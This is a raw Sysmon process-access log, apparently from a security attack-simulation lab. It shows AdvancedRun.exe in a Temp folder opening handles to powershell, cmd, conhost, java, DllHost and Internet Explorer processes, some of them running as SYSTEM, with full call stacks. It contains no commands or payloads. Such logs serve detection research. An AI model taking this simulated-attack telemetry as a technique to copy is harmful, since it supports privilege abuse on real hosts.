20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080517Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080516Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080515Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080514Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080513Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080512Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004080511Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080510Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080509Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080508Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080507Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080506Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080505Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080504Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMI